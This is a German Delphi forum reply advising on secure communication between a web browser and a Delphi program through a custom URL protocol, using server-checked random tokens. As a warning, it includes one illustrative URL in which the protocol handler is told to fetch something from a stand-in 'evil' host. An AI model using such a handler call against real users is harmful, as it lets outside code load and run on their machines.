AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren
Zurück Delphi-PRAXiS Sprachen und Entwicklungsumgebungen Sonstige Fragen zu Delphi Delphi Kommunikation zwischen Web-Browser und Delphi-Programm
Thema durchsuchen
Ansicht
Themen-Optionen

Kommunikation zwischen Web-Browser und Delphi-Programm

Ein Thema von Schwedenbitter · begonnen am 11. Nov 2009 · letzter Beitrag vom 13. Nov 2009
 
Benutzerbild von arbu man
arbu man

Registriert seit: 3. Nov 2004
Ort: Krefeld
1.108 Beiträge
 
Delphi 7 Professional
 
#7

Re: Kommunikation zwischen Web-Browser und Delphi-Programm

  Alt 13. Nov 2009, 12:47
(1) Ein Zufallszahl sollte ausreichen
(2) Das Clientprogramm schickt einen http-Request an den Server, der Server antwortet ob der Token gültig ist oder nicht. Näturlich sollte der Token täglich (oder öfters) geändert werden. Im Falle eines ungültigen Tokens sollte dann eine Warnmeldung kommen.
(3) Wenn du darauf verzichtest hast du ein potenzielles Sicherheitsproblem, wie kritisch das ist kann ich nicht beurteilen. Natürlich benötigt man für die Ausnutzung internes Wissen (mindestens den Protokollnamen und einige Befehle). Wie sicher du deine Software gestaltest bleibt natürlich dir überlassen. Wenn du nur den Namen der Steuerdatei übergibst hast du natürlich dadurch die Sicherheit das nur vom Server erstellte befehle ausgeführt werden können (es sei den man kann sowas machen myone://execute?url=http://evil_url_that_load_something_bad)

Gruß Björn
Björn
>> http://bsnx.net <<
Virtual DP Stammtisch v1.0"iw" am 19.09.2007 - ich war dabei!
  Mit Zitat antworten Zitat
 


Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 17:55 Uhr.
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024-2025 by Thomas Breitkreuz